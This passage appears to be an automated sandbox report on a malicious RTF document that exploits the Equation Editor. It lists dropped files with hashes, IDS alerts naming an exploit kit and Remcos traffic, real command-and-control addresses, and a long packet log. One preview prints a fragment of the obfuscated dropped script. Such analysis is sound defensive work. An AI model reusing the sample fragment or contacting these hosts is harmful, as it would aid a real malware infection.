                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unknown
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:Unknown
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Mon Oct 7 19:41:00 2024, length=101678, window=hide
                                                                Category:dropped
                                                                Size (bytes):1014
                                                                Entropy (8bit):4.5602265456227515
                                                                Encrypted:false
                                                                SSDEEP:12:8oL6FgXg/XAlCPCHaXT5BmmgB/5YXX+WL7LGuoNSj2icvbS3c4mjmDtZ3YilMME/:8EG/XTF1g4XlLZRjFem3CjmDv3q057u
                                                                MD5:DF68841DDAA3378CC2031E646EC4555A
                                                                SHA1:4CA6ED38B7D00E22E3F3CAA4973A20544D982366
                                                                SHA-256:D7C3EB18D337589E3D420301DA517C01D80B07A9A72C8EC7677BD0FA1CEA645F
                                                                SHA-512:EBC4399556665D9743E45BAE4B56509C7E5951939CDFF866553870E020BF428A0F4161FA15BE511BEF6A8EC714B8CE383734D458FA5DC39A0CD7D870D62A2764
                                                                Malicious:false
                                                                Preview:L..................F.... .....w.r.....w.r...I..8.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....GY....user.8......QK.XGY..*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....GY!. .BENWFI~1.RTF..J.......WD..WD.*.........................b.e.N.w.F.i.U.x.p.f...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\045012\Users.user\Desktop\beNwFiUxpf.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.b.e.N.w.F.i.U.x.p.f...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......045012..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:Generic INItialization configuration [folders]
                                                                Category:dropped
                                                                Size (bytes):55
                                                                Entropy (8bit):4.576547667952106
                                                                Encrypted:false
                                                                SSDEEP:3:HMA0xhVom4pxhVov:HBwYy
                                                                MD5:F6501270432946C129A740C197674334
                                                                SHA1:7F8C5ECE8FF0987E25BED35A2F8AA71D85642B12
                                                                SHA-256:D2D6B901B65C89D0EEBEB1FB768B0417853794AB56883CAD4594757908CB3E16
                                                                SHA-512:13FF2E2E714134778C0B68FF5D2C0E7A4EB5AC08827E33F5D2124B45F62ACA1BB971B49FF7ED5FE7800E7E9277204540D0D1F2E4227F706D4081CC7C48D09597
                                                                Malicious:false
                                                                Preview:[misc]..beNwFiUxpf.LNK=0..[folders]..beNwFiUxpf.LNK=0..
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.4797606462020307
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                Malicious:false
                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):236280
                                                                Entropy (8bit):3.7648240492046083
                                                                Encrypted:false
                                                                SSDEEP:3072:C3D5yTEc3Lyk0Qw81PBSH0Jcgt5p4Gwzd3y77iREYgKd8MBOcRxjhHlQTmG48jmW:CzAEcewL1IYixd3oCb98jV8S9
                                                                MD5:847293F65FBB8C1168A5FA7782EEDB3A
                                                                SHA1:6F82C998A5FA17A59C78430B4A32BE31D947F755
                                                                SHA-256:4CEA2DAD9EF99BC5FE90FB29BBCF18FC0C7893223ED2380F67DA3AC1BFB9FAC8
                                                                SHA-512:9E5AA5AFFBDA6E905BA3448B48F5F9EDE02BF24C2BCE4D4DE7A3B099D67EE6F38782AA0383F22793CDE63AE4C0B242068B6576DD467DBF8343CB06815477B482
                                                                Malicious:true
                                                                Preview:..K.R.t.L.o.i.i.L.b.c.R.R.C.P.p.h.U.a.v.K.p. .=. .".K.B.A.B.m.z.W.G.l.n.v.u.o.W.e.j.U.U.L.k.L.".....W.W.K.t.e.u.C.L.i.K.k.z.K.p.Z.b.L.L.R.b.G. .=. .".f.W.k.K.e.c.d.i.W.W.q.L.L.N.f.J.B.W.L.h.K.".....B.L.I.A.i.G.N.K.K.q.c.h.L.j.d.K.c.L.U.Z.c. .=. .".L.K.W.z.C.e.G.p.h.K.d.N.f.r.x.Q.K.t.f.L.l.".....f.L.L.z.o.T.k.o.H.u.L.G.f.u.P.K.A.s.h.B.A. .=. .".U.U.W.i.b.c.o.R.a.T.q.s.i.d.c.B.N.W.i.c.U.".....q.r.L.P.d.A.f.N.O.G.B.i.b.C.T.O.W.U.b.p.f. .=. .".G.B.I.K.u.d.c.L.p.R.O.c.T.W.G.m.T.o.N.k.v.".....P.z.G.W.U.i.a.c.c.u.K.z.W.U.C.P.I.W.Z.f.h. .=. .".P.h.c.G.U.i.f.d.n.L.t.L.P.K.L.z.b.h.K.U.j.".....Z.R.A.c.N.Z.U.Z.l.i.K.m.v.h.G.o.P.W.c.c.W. .=. .".e.A.I.U.d.T.e.K.Z.n.J.i.L.o.o.b.b.q.k.i.t.".....e.W.e.d.z.L.L.O.W.G.K.t.t.W.f.p.d.P.W.L.P. .=. .".O.B.G.U.L.f.s.C.z.x.G.t.i.f.I.L.Z.i.c.f.i.".....z.r.g.A.h.P.i.L.c.R.a.U.i.z.H.p.K.v.S.L.R. .=. .".G.o.G.P.P.L.I.P.g.n.f.t.z.G.B.k.a.B.c.p.b.".....l.h.W.k.S.K.L.K.u.c.m.R.k.C.h.L.U.O.G.G.q. .=. .".l.c.K.t.L.K.x.k.L.L.B.k.L.K.u.r.u.U.c.z.d.".........N.e.N.c.I.c.N.
                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):162
                                                                Entropy (8bit):2.4797606462020307
                                                                Encrypted:false
                                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                Malicious:false
                                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                File type:Rich Text Format data, version 1
                                                                Entropy (8bit):2.4605270008357074
                                                                TrID:
                                                                • Rich Text Format (5005/1) 55.56%
                                                                • Rich Text Format (4004/1) 44.44%
                                                                File name:beNwFiUxpf.rtf
                                                                File size:101'678 bytes
                                                                MD5:72dd90d54b9dcfe691ff308a9cacb72f
                                                                SHA1:79997f6339815718fdd17e5e4c47a6ea08a5549f
                                                                SHA256:7a8ccad40f6f34469ac64889b09cf44c53d2bb58dbb5e900abcc9703fa62ccb4
                                                                SHA512:4e362a0fe1ccb5701594547807d16303b7e11e3a2a4ac345afc267cdf75ac7d61b1f229f0eadd2c8afaca9352016d85b01636802f1ed2a54dc4c1205f553d169
                                                                SSDEEP:768:+a23bh38wymNnlLu3icae8CpFknywimz8fWYXyB7hpukIq:+aExVym583icBzwpz8fWYopuJq
                                                                TLSH:F9A39B9ED74F05A1CF50A27B032A4E4906FCB33EB24151B274AC933137ADD2E49626BD
                                                                File Content Preview:{\rtf1....{\*\geoRight628520126 \_}.{\22076177178@72*.92,<5!.?+@$23>=<!>?>8..2-?:.('?`!].<,.%|6(_3~>60?~>%]<?]?++5_'!%#-@,_|1%%=$(12`:.@[;.[<5.>$.!%%2_.6#?.6`5.?!#?$9,?6?:4(.68[93=?;1?.`]@7=!<4:)<4([=.,1.5&=?,]~3(^)-(6)$?)^?8,?62,/-%2&~)^+$&$|?][?=?&+3^7>
                                                                Icon Hash:2764a3aaaeb7bdbf
                                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                000000C23hno
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-07T22:41:14.020787+02002020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M11107.175.242.8080192.168.2.2249163TCP
                                                                2024-10-07T22:41:14.020787+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11107.175.242.8080192.168.2.2249163TCP
                                                                2024-10-07T22:41:16.402303+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249164192.210.214.914645TCP
                                                                2024-10-07T22:41:17.891226+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249165178.237.33.5080TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 7, 2024 22:41:04.730443954 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:04.735306025 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:04.735420942 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:04.735850096 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:04.740689993 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.238651991 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.238679886 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.238691092 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.238802910 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.238919020 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.238930941 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.238945007 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.238955975 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.239011049 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.239011049 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.239502907 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.239516973 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.239528894 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.239559889 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.239599943 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.243355036 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.243637085 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.243717909 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.243729115 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.243750095 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.243750095 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.243765116 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322005033 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322110891 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322124958 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322150946 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322150946 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322388887 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322401047 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322433949 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322433949 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322454929 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322639942 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322653055 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322690010 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322768927 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322904110 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322947979 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322961092 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.322983980 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.322983980 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.323354959 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.323483944 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.323517084 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.323528051 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.323539972 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.323630095 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.323801041 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.323812962 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.323862076 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.323862076 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.324167967 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.324217081 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.324321985 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.324332952 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.324409008 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.324548006 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.324559927 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.324655056 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.325018883 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.325115919 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.325128078 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.325154066 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.325155020 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.326966047 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.327133894 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.417352915 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.417423964 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.417438030 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.417468071 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.417468071 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.417557001 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.417627096 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.417643070 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.417654037 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.417665005 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.417680025 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.417704105 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.417704105 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.418211937 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418222904 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418369055 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.418450117 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418462038 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418473959 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418486118 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418497086 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418502092 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.418509007 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.418525934 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.418540001 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.419403076 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419414997 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419424057 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419435024 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419445038 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419457912 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419467926 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.419467926 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.419469118 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419480085 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.419656038 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.419656038 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.419656038 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.420373917 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420386076 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420397997 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420408010 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420435905 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.420548916 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.420908928 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420919895 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420929909 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420939922 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420950890 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420959949 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.420962095 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.420986891 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.420986891 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.421084881 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.421825886 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.421838999 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.421849966 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.421860933 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.421870947 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.421880960 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.421890974 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.421900034 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.421900034 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.421920061 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.422028065 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.422719955 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.422733068 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.422744036 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.422786951 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.422786951 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.511235952 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511291981 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.511317015 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511403084 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.511456013 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511467934 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511504889 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.511699915 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511712074 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511723995 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511734962 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.511775970 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.511775970 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.512305021 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.512321949 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.512334108 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.512342930 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.512358904 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.512365103 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.512365103 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.512368917 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.512408972 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.512408972 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.512408972 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.513273954 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513286114 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513295889 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513307095 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513314962 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513324976 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513335943 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513341904 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.513341904 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.513345957 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.513360023 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.513484001 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.514234066 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.514245033 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.514256001 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.514265060 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.514276028 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.514286041 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.514297962 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.514297962 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.514322042 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.514322042 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.515198946 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.515212059 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.515221119 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.515232086 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.515242100 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.515259027 CEST8049161107.175.242.80192.168.2.22
                                                                Oct 7, 2024 22:41:05.515263081 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.515263081 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.515292883 CEST4916180192.168.2.22107.175.242.80
                                                                Oct 7, 2024 22:41:05.515399933 CEST4916180192.168.2.22107.175.242.80
